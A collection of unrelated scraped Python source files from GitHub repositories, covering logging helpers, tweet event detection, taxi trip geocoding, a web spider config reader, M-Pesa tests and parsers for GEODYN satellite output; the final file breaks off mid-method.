format_sep = "-+-".join(["{{:<{}}}".format(i) for i in col_size])
# print table
print_log(format_edg.format(*p_list[0]), logger, level=level)
for item in p_list[1:-1]:
if item[0][0] == '-':
print_log(format_sep.format(*item), logger, level=level)
else:
print_log(format_str.format(*item), logger, level=level)
print_log(format_edg.format(*p_list[-1]), logger, level=level)
def progress_bar(logger: Logger,
iterator: Iterable = None,
total: int = None,
ncols: Optional[int] = None,
bar_format: Optional[str] =
"{l_bar}{bar:20}| {n_fmt}/{total_fmt} {elapsed}<{remaining}, {rate_fmt}{postfix}",
leave: bool = False,
**kwargs) -> tqdm:
return tqdm(
iterator,
total=total,
ncols=ncols,
bar_format=bar_format,
ascii=False,
disable=(not (logger.level == logging.INFO and is_main_process())),
leave=leave,
**kwargs
)
class TqdmHandler(StreamHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def emit(self, record):
try:
msg = self.format(record)
tqdm.write(msg)
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.handleError(record)
class ColoredFormatter(Formatter):
BLACK = "\033[30m"
RED = "\033[31m"
YELLOW = "\033[33m"
GREEN = "\033[32m"
GREY = "\033[37m"
RESET = "\033[0m"
COLORS = {
logging.ERROR: RED,
logging.WARNING: YELLOW,
logging.INFO: GREEN,
logging.DEBUG: GREY,
logging.NOTSET: BLACK
}
def __init__(self, colored=True, *args, **kwargs):
super().__init__(*args, **kwargs)
self.colored = colored
def format(self, record):
fmt = "[%(asctime)s %(levelname)s] %(message)s"
if self.colored:
fmt = f"{self.COLORS[record.levelno]}[%(asctime)s %(levelname)s]" \
f"{self.RESET} %(message)s"
datefmt = "%Y-%m-%d %H:%M:%S"
return Formatter(fmt=fmt, datefmt=datefmt).format(record)
def is_main_process():
if not dist.is_available() or not dist.is_initialized():
return True
else:
return dist.get_rank() == 0
logger = get_logger()
| ningyuxu/calf | calf/utils/log.py | log.py | py | 5,539 | python | en | code | 0 | github-code | 90 |
17922200066 | #!/usr/bin/env python
import os
from trackutil.pathutil import get_timestamps_in_dir,\
get_datafiles_in_dir, mkdir
from trackutil.pathutil import get_ts_int_in_dir
from trackutil.pathutil import get_storyline_module_dir
from trackutil.pathutil import get_storyline_root
from trackutil.confutil import get_config
from trackutil.ioutil import jsonload, jsondump
from trackutil.logger import INFO
from trackutil.alg import ig
def main():
cfg = get_config()
root = cfg['data']['outdir']
root = os.path.join(root, cfg['storyline']['datadir'])
inputdir = os.path.join(root, cfg['storyline']['bucketize']['datadir'])
outputdir = os.path.join(root, cfg['storyline']['detect']['datadir'])
metadir = os.path.join(root, cfg['storyline']['detect']['metadatadir'])
thresh = cfg['storyline']['detect']['ig_thresh']
tslist = get_timestamps_in_dir(inputdir)
processed = 0
total = len(tslist)
for i in range(total):
if i == 0:
pre_ts = -1
else:
pre_ts = tslist[i - 1]
ts = tslist[i]
pre_top_kwp_list = get_pre_top_ig_kwp(metadir, pre_ts)
get_top_ig_buckets(
inputdir, outputdir, ts, thresh, pre_top_kwp_list, metadir)
processed += 1
INFO('processed {}/{}'.format(processed, total))
def eventdetect(ts, cfg=None):
INFO('[High IG Keyword Pair Detect] {}'.format(ts))
if cfg is None:
cfg = get_config()
root = get_storyline_root(cfg)
inputdir = get_storyline_module_dir(cfg, 'bucketize')
outputdir = get_storyline_module_dir(cfg, 'detect')
metadir = os.path.join(root, cfg['storyline']['detect']['metadatadir'])
thresh = cfg['storyline']['detect']['ig_thresh']
mkdir(outputdir)
tslist = get_ts_int_in_dir(inputdir)
cur_idx = tslist.index(ts)
if cur_idx == 0:
pre_ts = -1
else:
pre_ts = tslist[cur_idx - 1]
pre_top_kwp_list = get_pre_top_ig_kwp(metadir, pre_ts)
get_top_ig_buckets(
inputdir, outputdir, ts, thresh, pre_top_kwp_list, metadir)
def get_pre_top_ig_kwp(datadir, pre_ts):
'''
Get the top IG keyword pairs of the (previous) timestamp.
'''
if pre_ts < 0:
return []
mkdir(datadir)
fn = '{}.json'.format(pre_ts)
kwp_list = jsonload(os.path.join(datadir, fn))
if kwp_list is None:
kwp_list = []
return kwp_list
def get_top_ig_buckets(input_dir, outputdir, ts, thresh, pre_top_kwp_list,
metadir):
'''
Get the top Infomation Gain kw paris.
'''
mkdir(outputdir)
cur_buckets, pre_buckets = get_combined_buckets(input_dir, ts)
if cur_buckets is None:
return
cur_total = get_tweet_num(cur_buckets)
pre_total = get_tweet_num(pre_buckets)
cur_buckets = remove_unpopular_kwpair(cur_buckets)
result = {}
pre_top_kwp_list = set(pre_top_kwp_list)
stat_inherited_num = 0
stat_skipped_pre_num = 0
for kwp in cur_buckets:
# process the inherited high IG keyword pairs from the pre window
if kwp in pre_top_kwp_list:
if kwp not in pre_buckets:
pre_len = 0
else:
pre_len = len(pre_buckets[kwp])
cur_len = len(cur_buckets[kwp])
if cur_len > pre_len / 2.0:
result[kwp] = {}
result[kwp]['tweets'] = cur_buckets[kwp]
result[kwp]['ig'] = -1000.0
result[kwp]['igparam'] = []
stat_inherited_num += 1
else:
# INFO('Found a kwp {} that we stop tracking'.format(kwp))
stat_skipped_pre_num += 1
continue # we just continue to process next kwp
assert kwp not in pre_top_kwp_list
# process the non-inherited keyword pairs
B = len(cur_buckets[kwp])
D = cur_total - B
if kwp not in pre_buckets:
A = 0
else:
A = len(pre_buckets[kwp])
C = pre_total - A
if B < A:
# seems the keywork pair is losing popularity
continue
IG = ig(A, B, C, D)
if IG >= thresh:
result[kwp] = {}
result[kwp]['tweets'] = cur_buckets[kwp]
result[kwp]['ig'] = IG
result[kwp]['igparam'] = [A, B, C, D]
INFO('Inherited {} kwp, skipped {} kwp from pre window'.format(
stat_inherited_num, stat_skipped_pre_num))
fn = '{}.json'.format(ts)
jsondump(result, os.path.join(outputdir, fn))
# dump the high IG kwp for next window
jsondump(result.keys(), os.path.join(metadir, fn))
def get_tweet_num(buckets):
''' Get the number of distinct tweets in the buckets '''
tweets = set([])
for key in buckets:
for item in buckets[key]:
tweets.add(item[0])
return len(tweets)
def remove_unpopular_kwpair(buckets):
'''
Remove the unpopular kw pairs in the current window.
'''
cfg = get_config()
popthresh = cfg['storyline']['detect']['kw_pop_thresh']
buckets_cleaned = {}
for key in buckets:
if len(buckets[key]) < popthresh:
continue
buckets_cleaned[key] = buckets[key]
return buckets_cleaned
def get_combined_buckets(input_dir, ts):
'''
Get the buckets in the window ending with the ts and those in the
previous window as well. Return None, None if we do not have enough history.
'''
ts = str(ts)
tslist = get_timestamps_in_dir(input_dir)
idx = tslist.index(ts)
cfg = get_config()
windowlen = cfg['storyline']['windowlen']
if idx + 1 < 2 * windowlen:
INFO('Do not have enough history')
return None, None
cur_buckets = get_window_buckets(input_dir, ts)
pre_buckets = get_window_buckets(input_dir, tslist[idx - windowlen])
return cur_buckets, pre_buckets
def get_window_buckets(input_dir, ts):
''' Get the buckets in a window '''
tslist = get_timestamps_in_dir(input_dir)
fnlist = get_datafiles_in_dir(input_dir)
cfg = get_config()
idx = tslist.index(ts)
windowlen = cfg['storyline']['windowlen']
assert(idx + 1 >= windowlen)
buckets = {}
for i in range(idx + 1 - windowlen, idx + 1):
b = jsonload(os.path.join(input_dir, fnlist[i]))
for k in b:
if k not in buckets:
buckets[k] = []
buckets[k].extend(b[k])
return buckets
if __name__ == '__main__':
main()
| shiguangwang/storyline | storyline/eventdetect.py | eventdetect.py | py | 6,449 | python | en | code | 0 | github-code | 90 |
11212186057 | import random
lenght = int(input('Введите количество эллементов массива: '))
num = []
i = 0
while i < lenght:
num.append(round(random.random()*100))
i += 1
print(num)
i = 0
min1 = min(num)
print(min(num))
num.remove(min1)
min2 = min(num)
if min2 == min1:
print(min1)
else:
print(min2) | Solaer/GB_homework | Homework_3/hw7.py | hw7.py | py | 335 | python | ru | code | 0 | github-code | 90 |
33706485158 | # from netCDF4 import Dataset
import numpy as np
import pandas as pd
# import os
import datetime
def my_function():
print("Hello World")
class iieout_read:
'''
This class reads the iieout data and returns information based on user input.
'''
def __init__(self, iieout_file):
self.iieout_file = iieout_file
self.text_iternumber = 'CONVERGENCE'
self.text_find_sats = "STATION-SATELLITE CONFIGURATION DSS1WRNG 9806701"
def find_satIDs(self):
allsats = []
with open(self.iieout_file, 'r') as f:
for line_no, line in enumerate(f):
if self.text_find_sats in line:
allsats.append(int(line[90:100]))
SatIDs = []
for sat in allsats:
if sat not in SatIDs:
SatIDs.append(sat)
return SatIDs
class read_ascii_xyz:
'''
This class reads the ascii_xyz data and returns information based on user input.
'''
def __init__(self, ascii_xyz_file, iieout_file, choose_sat):
self.ascii_xyz_file = ascii_xyz_file
self.iieout_file = iieout_file
# self.text_find_sats = "ARC 1 FOR INNER ITERATION 6 OF GLOBAL ITERATION 1"
self.choose_sat = choose_sat
def iteration_number(self):
'''
This function opens the iieout file, and returns the final iteration number
'''
with open(self.iieout_file, 'r') as f:
for line_no, line in enumerate(f):
if 'CONVERGENCE' in line:
line_text = line
# print(line)
num_iters = float(line_text[39:42])-1
return num_iters
def find_satIDs(self):
'''
This function loops through the ascii_xyz file and returns the satellite ID
numbers by identifying all the unique satellite IDs
'''
numiters = read_ascii_xyz.iteration_number(self)
text_find_sats = "ARC 1 FOR INNER ITERATION %d OF GLOBAL ITERATION 1" % int(numiters)
allsats = []
with open(self.ascii_xyz_file, 'r') as f:
for line_no, line in enumerate(f):
if text_find_sats in line:
# print(line[90:100])
allsats.append((int(line[45:54])))
# line_no_1 =lines_list
SatIDs = []
for sat in allsats:
if sat not in SatIDs:
SatIDs.append(sat)
return SatIDs
def get_single_sat_data(self):
'''
This function loops through only the final iteration of the axi_xyz file,
and returns a dictionary that contains all the data for one single satellite.
In this function it is a satellite chosen by the user.
Eventually this should be update to return info for ALL satellites.
'''
# First need to construct a dictionary that has all the line numbers where each
# satellite appears:
numiters = read_ascii_xyz.iteration_number(self)
SatIDs_ascii = read_ascii_xyz.find_satIDs(self)
SatID_dict = {}
iteration = str(int(numiters))
for val_sat in SatIDs_ascii:
print(val_sat)
lines = []
text = str(val_sat) + " OF ARC 1 FOR INNER ITERATION "+ iteration
with open(self.ascii_xyz_file, 'r') as f:
for line_no, line in enumerate(f):
if text in line:
lines.append(line_no)
SatID_dict[val_sat] = lines
# Next, we need to loop through and grab the data.
# Because of the weird formatting, we search for the satellite header.
# If the header line starts with 1 the next 3 lines are headers and we skip them
# If the header line starts with 0, the next line has the data
data_dict = {}
isat = self.choose_sat
iii = 0
# for iii, isat in enumerate(SatID_dict):
B = pd.DataFrame(data={'YYMMDD' :[], # DATE GREENWICH TIME
'HHMM' :[],
'SECONDS' :[],
'X' :[], # INERTIAL CARTESIAN COORDINATES
'Y' :[],
'Z' :[],
'XDOT' :[], # INERTIAL CARTESIAN VELOCITY
'YDOT' :[],
'ZDOT' :[],
'LAT' :[], # GEODETIC EAST SPHEROID
'LONG' :[],
'HEIGHT' :[]})
# print(SatID_dict)
for iline in SatID_dict[isat]:
with open(self.ascii_xyz_file, 'r') as f:
for _ in range(iline):
f.readline()
line = f.readline()
if int(line[0]) == 0:
ephems_csv = pd.read_csv(self.ascii_xyz_file,
skiprows = iline+1,
nrows = 3,
names = ['YYMMDD',
'HHMM',
'SECONDS',
'X',
'Y',
'Z',
'XDOT',
'YDOT',
'ZDOT',
'LAT',
'LONG',
'HEIGHT',
],
sep = '\s+',
)
elif int(line[0]) == 1:
ephems_csv = pd.read_csv(self.ascii_xyz_file,
skiprows = iline+3,
nrows = 3,
names = ['YYMMDD',
'HHMM',
'SECONDS',
'X',
'Y',
'Z',
'XDOT',
'YDOT',
'ZDOT',
'LAT',
'LONG',
'HEIGHT',
],
sep = '\s+',
)
A = pd.DataFrame(ephems_csv)
B = pd.concat([ B, A])
index_list = []
for index, row in B.iterrows():
try:
float(row['HHMM'])
except:
index_list.append(index)
continue
C=B.drop(index_list)
data_dict[isat] = C
# print(C)
date_isat = read_ascii_xyz.make_datetime_column(data_dict[isat], VERBOSE_timer=True)
data_dict[isat]['Date'] = date_isat
return data_dict
def make_datetime_column(isat_data, VERBOSE_timer):
# isat_data = data_dict[isat]
# VERBOSE_timer=True
if VERBOSE_timer == True:
import time
start = time.time()
else:
pass
timeHHMM = []
for i,val in enumerate(isat_data['HHMM'].values.astype(int)):
# print(len(str(val)))
if len(str(val)) == 3:
timehhmm_val = '0'+ str(val)
timeHHMM.append(timehhmm_val)
if len(str(val)) == 2:
timehhmm_val = '00'+ str(val)
timeHHMM.append(timehhmm_val)
if len(str(val)) == 4:
timehhmm_val = str(val)
timeHHMM.append(timehhmm_val)
if len(str(val)) == 1:
timehhmm_val = '000'+ str(val)
timeHHMM.append(timehhmm_val)
# print(val)
# print('1!!!!', np.shape(timeHHMM))
isat_data['timeHHMM'] = timeHHMM
year = []
month = []
day = []
hours = []
minutes = []
secs = []
microsecs = []
for i,val in enumerate(isat_data['YYMMDD'].values.astype(int).astype(str)):
# print(val)
year.append('20' + val[:2])
month.append(val[2:4])
day.append(val[4:])
# print('HERE',isat_data['timeHHMM'].values.astype(str)[i][:2])
hours.append(isat_data['timeHHMM'].values.astype(str)[i][:2])
minutes.append(isat_data['timeHHMM'].values.astype(str)[i][2:4])
secs.append(isat_data['SECONDS'].values.astype(str)[i][:2])
# microsecs.append(isat_data['Sec-UTC-R'][i][3:])
isat_data['year'] = year
isat_data['month'] = month
isat_data['day'] = day
isat_data['hours'] = hours
isat_data['minutes'] = minutes
isat_data['secs'] = secs
# isat_data['microsecs'] = microsecs
if VERBOSE_timer == True:
end = time.time()
elapsed = end - start
print("Loop through and extract indiv date vals:",elapsed)
else:
pass
fix_decimal = []
for i,val in enumerate(isat_data['secs'].astype(str)):
# print(i,val)
if val.find('.') == 1:
# print(i, val)
fix_decimal.append( '0'+val[:-1])
# print(newval)
else:
fix_decimal.append( val)
if VERBOSE_timer == True:
end = time.time()
elapsed = end - start
print("Fix decimals in the seconds column:",elapsed)
else:
pass
year= list(map(int, isat_data['year'].values))
month= list(map(int, isat_data['month'].values))
day= list(map(int, isat_data['day'].values))
hour= list(map(int, isat_data['hours'].values))
minute = list(map(int, isat_data['minutes'].values))
second = list(map(int, fix_decimal))
DATE = list(map(datetime.datetime, year,month, day, hour,minute,second ))
if VERBOSE_timer == True:
end = time.time()
elapsed = end - start
print("Put all dates in a single column:",elapsed)
else:
pass
return(DATE)
class read_residuals_iieout:
'''
This class reads the iieout data and returns the observation residuals.
'''
def __init__(self, iieout_file, VERBOSE_timer):
self.iieout_file = iieout_file
self.VERBOSE_timer =VERBOSE_timer
def iteration_number(self):
'''
This function opens the iieout file, and returns the final iteration number
'''
with open(self.iieout_file, 'r') as f:
for line_no, line in enumerate(f):
if 'CONVERGENCE' in line:
line_text = line
# print(line)
num_iters = float(line_text[39:42])-1
return num_iters
# find the satellites in the GEODYN Run:
def find_Sat_IDs_resids(self):
text="STATION-SATELLITE CONFIGURATION DSS1WRNG 9806701"
allsats = []
with open(self.iieout_file, 'r') as f:
for line_no, line in enumerate(f):
if text in line:
# print(line[90:100])
allsats.append(int(line[70:81]) )
# print(line)
# line_no_1 =lines_list
SatIDs = []
for sat in allsats:
if sat not in SatIDs:
SatIDs.append(sat)
iteration = read_residuals_iieout.iteration_number(self)
text_obs_resid = 'OBSERVATION RESIDUALS FOR ARC 1 FOR INNER ITERATION '+ str(int(iteration))
lines_list = [] #np.empty(np.size(num_observations))
with open(self.iieout_file, 'r') as f:
for line_no, line in enumerate(f):
if text_obs_resid in line:
# print(line_no)
lines_list.append(line_no)
# line_no_1 =lines_list
# lines = search_iiesout_all_line_numbers(iieout_file, text)
line_no_1 = lines_list[0]
line_no_2 = lines_list[-1]
# find the satellites in the GEODYN Run:
text="STATION-SATELLITE CONFIGURATION DSS1WRNG 9806701"
allsats = []
with open(self.iieout_file, 'r') as f:
for line_no, line in enumerate(f):
if text in line:
# print(line[90:100])
allsats.append(int(line[70:81]) )
# print(line)
# line_no_1 =lines_list
SatIDs = []
for sat in allsats:
if sat not in SatIDs:
SatIDs.append(sat)
return SatIDs
def make_datetime_column(resid_df, self):
if self.VERBOSE_timer == True:
import time
start = time.time()
else:
pass
timeHHMM = []
for i,val in enumerate(resid_df['HHMM']):
if len(val) == 3:
timehhmm_val = '0'+ val
timeHHMM.append(timehhmm_val)
if len(val) == 2:
timehhmm_val = '00'+ val
timeHHMM.append(timehhmm_val)
if len(val) == 4:
timehhmm_val = val
timeHHMM.append(timehhmm_val)
if len(val) == 1:
timehhmm_val = '000'+ val
timeHHMM.append(timehhmm_val)
np.shape(timeHHMM)
resid_df['timeHHMM'] = timeHHMM
year = []
month = []
day = []
hours = []
minutes = []
secs = []
microsecs = []
for i,val in enumerate(resid_df['YYMMDD']):
year.append('20' + val[:2])
month.append(val[2:4])
day.append(val[4:])
hours.append(resid_df['timeHHMM'][i][:2])
minutes.append(resid_df['timeHHMM'][i][2:4])
secs.append(resid_df['Sec-UTC-R'][i][:2])
microsecs.append(resid_df['Sec-UTC-R'][i][3:])
resid_df['year'] = year
resid_df['month'] = month
resid_df['day'] = day
resid_df['hours'] = hours
resid_df['minutes'] = minutes
resid_df['secs'] = secs
resid_df['microsecs'] = microsecs
if self.VERBOSE_timer == True:
end = time.time()
elapsed = end - start
print("Loop through and extract indiv date vals:",elapsed)
else:
pass
fix_decimal = []
for i,val in enumerate(resid_df['secs'].astype(str)):
# print(i,val)
if val.find('.') == 1:
# print(i, val)
fix_decimal.append( '0'+val[:-1])
# print(newval)
else:
fix_decimal.append( val)
if self.VERBOSE_timer == True:
end = time.time()
elapsed = end - start
print("Fix decimals in the seconds column:",elapsed)
else:
pass
year= list(map(int, resid_df['year'].values))
month= list(map(int, resid_df['month'].values))
day= list(map(int, resid_df['day'].values))
hour= list(map(int, resid_df['hours'].values))
minute = list(map(int, resid_df['minutes'].values))
second = list(map(int, fix_decimal))
microsecond= list(map(int, resid_df['microsecs'].values))
DATE = list(map(datetime.datetime, year,month, day, hour,minute,second,microsecond ))
if self.VERBOSE_timer == True:
end = time.time()
elapsed = end - start
print("Put all dates in a single column:",elapsed)
else:
pass
return(DATE)
def read_observed_resids_by_sat(self ):
# def read_obs_residuals(iieout_file, iteration, VERBOSE_timer):
iteration = str(int(read_residuals_iieout.iteration_number(self)))
# VERBOSE_timer = True
if self.VERBOSE_timer == True:
import time
start = time.time()
else:
pass
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
'''
Now find all the instances of the OBSERVATION RESIDUALS
header at this iteration. These are stored in a list.
'''
text_obs_resid = 'OBSERVATION RESIDUALS FOR ARC 1 FOR INNER ITERATION '+ str(int(iteration))
SatIDs = read_residuals_iieout.find_Sat_IDs_resids(self)
lines_list = [] #np.empty(np.size(num_observations))
with open(self.iieout_file, 'r') as f:
for line_no, line in enumerate(f):
if text_obs_resid in line:
# print(line_no)
lines_list.append(line_no)
# line_no_1 =lines_list
import time
start = time.time()
init_df = pd.DataFrame(data={'YYMMDD' :[],
'HHMM' :[],
'Sec-UTC-R' :[],
'Observation' :[],
'Residual' :[],
'Ratio to sigma' :[],
'Elev1' :[],
'Elev2' :[],
'OBS No.' :[],
'Block' :[],})
dict_sat = {}
for i in SatIDs:
dict_sat[i]= init_df
for i,iline in enumerate(lines_list):
with open(self.iieout_file, 'r') as f:
for _ in range(iline+1):
f.readline()
line = f.readline()
sat_line = int(line[70:81]) #int(line[90:100])
print(line)
print(sat_line)
RESID_OBSERV = pd.read_csv(self.iieout_file,
skiprows = lines_list[0] + 6 ,
nrows = int((lines_list[0 + 1]-6 - lines_list[0]-7) ),
names = ['YYMMDD',
'HHMM',
'Sec-UTC-R',
'Observation',
'Residual',
'Ratio to sigma',
'Elev1',
'Elev2',
'OBS No.',
'Block'],
sep = '\s+',
)
A = pd.DataFrame(RESID_OBSERV)
B = dict_sat[sat_line]
dict_sat[sat_line] = pd.concat([ B, A])
end = time.time()
elapsed = end - start
print("Elapsed time:",elapsed)
print(i ,'/', str(len(lines_list)))
return RESID_OBSERV
def read_observed_resids_all(self):
iteration = str(int(read_residuals_iieout.iteration_number(self)))
if self.VERBOSE_timer == True:
import time
start = time.time()
else:
pass
#-------------------------------------------------------------------------------
'''
First we need to find how many observations there are:
'''
text_smry_meas = 'RESIDUAL SUMMARY BY MEASUREMENT TYPE FOR ARC 1 INNER ITERATION '+ (iteration) +' OF GLOBAL ITERATION 1'
with open(self.iieout_file, 'r') as f:
for line_no, line in enumerate(f):
if text_smry_meas in line:
# print(line_no)
# lines_list= (line_no)
RESID_OBSERV = pd.read_csv(self.iieout_file,
skiprows = line_no+2 , # to 53917
nrows = 4,
names = ['num','NUMBER', 'MEAN','RMS','No.WTD', 'wtd-mean','wtd-rms','Type'],
sep = '\s+',
)
num_observations = np.float(RESID_OBSERV.num.sum())
text_obs_resid = 'OBSERVATION RESIDUALS FOR ARC 1 FOR INNER ITERATION '+ (iteration)
num_observations = num_observations
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
'''
Now find all the instances of the OBSERVATION RESIDUALS
header at this iteration. These are stored in a list.
'''
lines_list = [] #np.empty(np.size(num_observations))
with open(self.iieout_file, 'r') as f:
for line_no, line in enumerate(f):
if text_obs_resid in line:
# print(line_no)
lines_list.append(line_no)
# line_no_1 =lines_list
# lines = search_iiesout_all_line_numbers(iieout_file, text)
line_no_1 = lines_list[0]
line_no_2 = lines_list[-1]
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
'''
Use the first and last line numbers from above to select
the sections of data that contains the observation residuals.
The outputted csv data are stored as A
'''
RESID_OBSERV = pd.read_csv(self.iieout_file,
skiprows = line_no_1 + 6 ,
nrows = int((line_no_2 - line_no_1) ),
names = ['YYMMDD',
'HHMM',
'Sec-UTC-R',
'Observation',
'Residual',
'Ratio to sigma',
'Elev1',
'Elev2',
'OBS No.',
'Block'],
sep = '\s+',
)
if self.VERBOSE_timer == True:
end = time.time()
elapsed = end - start
print("Elapsed time after line search setup:",elapsed)
else:
pass
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
'''
We now need to fix the data that contains a lot of misplaced
characters, random strings, and headers
'''
A = pd.DataFrame(RESID_OBSERV) # input
index_list = []
for index, row in A.iterrows():
try:
float(row['OBS No.'])
float(row['HHMM'])
except:
index_list.append(index)
continue
B=A.drop(index_list)
if self.VERBOSE_timer == True:
end = time.time()
elapsed = end - start
print("Elapsed time after loop through then drop indecies:",elapsed)
else:
pass
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
'''
We locate the index of the last observation number and remove
all datapoints that are after it in the DataFrame
'''
C = B.reset_index()
index_drops = np.arange(last_index, np.shape(C["OBS No."]))
index_drops
D = C.drop(index_drops)
if self.VERBOSE_timer == True:
end = time.time()
elapsed = end - start
print("Elapsed time after dropping all bad indicies after last obs no.:",elapsed)
dates = read_residuals_iieout.make_datetime_column(D, self)
D['Date'] = dates
fix_string = []
for i,val in enumerate(D['Ratio to sigma']):
try:
float(val)
fix_string.append(val)
except:
# print(i, val)
fix_string.append(val[:-1])
D['Ratio_to_sigma_fixed'] = fix_string
return(D)
| zachwaldron4/pygeodyn | notebooks/old_analysis/util_funcs/util_graveyard/Read_GEODYN_output.py | Read_GEODYN_output.py | py | 24,582 | python | en | code | 4 | github-code | 90 |
18578987859 | n, y = map(int, input().split())
rem = 0
for i in range(y//10000 +1):
rem = y-10000*i
for j in range(rem//5000 + 1):
k = (rem - 5000*j) // 1000
if (i + j+ k) == n:
print(i, j, k)
break
else:
continue
break
else:
print(-1, -1, -1) | Aasthaengg/IBMdataset | Python_codes/p03471/s837208967.py | s837208967.py | py | 298 | python | en | code | 0 | github-code | 90 |
41545043086 | import pandas as pd
from geopy.geocoders import Nominatim
from tqdm import tqdm
import numpy as np
import re
import time
import csv
print("Here we go")
geolocator = Nominatim()
data = pd.read_csv("data_with_weekdays.csv")
print('Data read! ')
# check nan value for pick up point
data = data[np.isfinite(data['Pickup_latitude'])]
print(data.shape)
# modify the lat & long in order to get addresses
# for weekdays change coordinates granularities
lat_day = data['Pickup_latitude'].tolist()
lon_day = data['Pickup_longitude'].tolist()
lat_day = [round(i,3) for i in lat_day]
lat_day = [str(i) for i in lat_day]
lon_day = [round(i,3) for i in lon_day]
lon_day =[str(i) for i in lon_day]
lon_day =[' ,'+ i for i in lon_day]
coor_day = [x+y for x,y in zip(lat_day,lon_day)]
set1 = set(coor_day)
unique_coord = list(set1)
print('Done')
data['Coor'] = coor_day
# for count merging later
df1=pd.DataFrame({'Coor':unique_coord})
addresses = []
notfound = 0
# get all the geo info
for i in tqdm(unique_coord):
location = geolocator.reverse(i,timeout=50)
if location.address == None:
location ='NaN'
notfound += 1
addresses.append(location)
print(len(addresses))
print(addresses[-1])
print("%d" % notfound+ 'hasnt been found')
else:
print(location.address)
addresses.append(location.address)
print(len(addresses))
print(addresses[-1])
time.sleep(1)
print(len(addresses))
print(df1.shape)
df1['address'] = addresses
# merge address to dataframe
# merge frist then count
# COUNT meaning the amount of taxi in that certain address
zipcodes = []
for i in addresses:
num = re.findall(r"\D(\d{5})\D", i)
num = list(filter(str.isdigit, num))
zipcode = ''.join(num)
zipcodes.append(zipcode)
# add zipcode
df1['zipcode'] = zipcodes
df1.to_csv("zipcodes_coords.csv")
#merge
data =pd.merge(data, df1, how='left', on=['Coor'])
#Count taxi amount in certain Zip Code
# add zipcode frequency aka Taxi demand to original dataframe
data['Taxi_Demand'] = data.groupby('zipcode')['zipcode'].transform('count')
data.to_csv('full_data.csv')
print('Done')
| ruoyucad/NYC_greentaxi | source/feature_engineering_taxi_demand.py | feature_engineering_taxi_demand.py | py | 2,080 | python | en | code | 1 | github-code | 90 |
30785032175 | # -*- coding: utf-8 -*-
class Order:
orderId = ''
timestamp = ''
exchange = ''
route = ''
symbol = ''
side = ''
type = ''
price = 0.0
quantity = 0
history = []
def __init__(self, orderID, timestamp, exchange, route, symbol, side, type, price, quantity):
self.orderId = orderID
self.timestamp = timestamp
self.exchange = exchange
self.route = route
self.symbol = symbol
self.side = side
self.type = type
self.price = price
self.quantity = quantity
class OrderEvent:
orderId = ''
timestamp = 0.0
evttype = ''
evtorigim = ''
body = {}
def __init__(self, orderId, timestamp, evttype, evtorigin, body):
self.orderId = orderId
self.timestamp = timestamp
self.evttype = evttype
self.evtorigin = evtorigin
self.body = body
| fybbr/gotcha | ambitious/entities.py | entities.py | py | 923 | python | en | code | 0 | github-code | 90 |
10959460561 | from __future__ import unicode_literals
from django.urls import reverse
from django.test import TestCase
from trial_version.environ import *
from trial_version.mpesa.utils import *
class EnvironTestCase(TestCase):
def test_environ(self):
value = mpesa_config('TEST_CREDENTIAL')
self.assertEqual(value, '12345')
def test_oauth_correct_credentials(self):
'''
Test correct credentials sent to oauth endpoint
'''
r = generate_access_token_request()
self.assertEqual(r.status_code, 200)
def test_oauth_wrong_credentials(self):
'''
Test wrong credentials sent to OAuth endpoint
'''
consumer_key = 'wrong_consumer_key'
consumer_secret = 'wrong_consumer_secret'
r = generate_access_token_request(consumer_key, consumer_secret)
self.assertEqual(r.status_code, 400) # Unauthorized
def test_access_token_valid(self):
'''
Test that access token is never older than 50 minutes
'''
token = generate_access_token()
delta = timezone.now() - token.created_at
minutes = (delta.total_seconds()//60)%60
self.assertLessEqual(minutes, 50) | martinmogusu/trial-version | tests/test_environ.py | test_environ.py | py | 1,071 | python | en | code | 0 | github-code | 90 |
11088505163 | #encoding:UTF-8
import argparse
import ConfigParser
class MiniSpider:
url_list_file=""
output_directory=""
max_depth=1
crawl_interval=1
crawl_timeout=1
target_url=""
thread_count=1
def __init__(self):
parser = argparse.ArgumentParser()
parser.add_argument('-c','--conf',help="the file of the conf")
parser.add_argument('-v','--version', action='version',version='%(prog)s 1.0')
args = parser.parse_args()
confFile = args.conf
self.__getConf__(confFile)
def __getConf__(self,filename):
configParser = ConfigParser.ConfigParser()
configParser.read(filename)
self.url_list_file = configParser.get("spider","url_list_file")
self.output_directory = configParser.get("spider","output_directory")
self.max_depth = configParser.getint("spider","max_depth")
self.crawl_interval = configParser.getint("spider","crawl_interval")
self.crawl_timeout = configParser.getint("spider","crawl_timeout")
self.target_url = configParser.get("spider","target_url")
self.thread_count = configParser.getint("spider","thread_count")
#print self.url_list_file
#print self.thread_count
if __name__=="__main__":
miniSpider = MiniSpider()
| NemoGood/mini_spider | mini_spider.py | mini_spider.py | py | 1,292 | python | en | code | 0 | github-code | 90 |
8589067605 | ## @package parsers.reliability2_exporter
import csv
from parsers.reliability2_parser import Reliability2Parser
from utils.backend_utils import BackendUtils
## This calss writes details about a check2 object (a unit of data from the Reliability2 App) to a CSV file.
class Reliability2Exporter(object):
## Constructor
# @param self
# @param write_filename (string) path to the csv file we will write the data to
# @param check2 (Check2) a Check2 object containing the data to write - see data_structs.Check2
def __init__(self, write_filename, check2):
self.out_file = open(write_filename, 'wb')
self.in_file = open(check2.csv_filename, 'rb')
self.check2 = check2
## This method extracts data from the Check2 object and writes it to the csv file in a nicely formatted manner.
# @param self
# @param include_trans (boolean) If True, the method will append an extra CSV column containing the actual transcription
# text that was entered by the user for each clip.
# @param progress_update_fcn (function=None) function accepting a value in [0,1] to display as a progress bar - see utils.ProgressDialog. This value is used to indicate the level of completeness <em>of the current phase</em>
# @param progress_next_phase_fcn(function=None) - moves the progress bar to the next phase, which causes new text to be displayed in the bar - see utils.ProgressDialog
def export(self, include_trans, progress_update_fcn=None, progress_next_fcn=None):
reader = csv.DictReader(self.in_file)
extra_headers = ['Child Voc', 'Word Count']
if include_trans:
extra_headers.append('Transcription')
out_headers = reader.fieldnames + extra_headers
writer = csv.DictWriter(self.out_file, out_headers)
writer.writeheader()
#The composite key (child_code, timestamp) uniquely identifies a row (assuming a child can't be in two
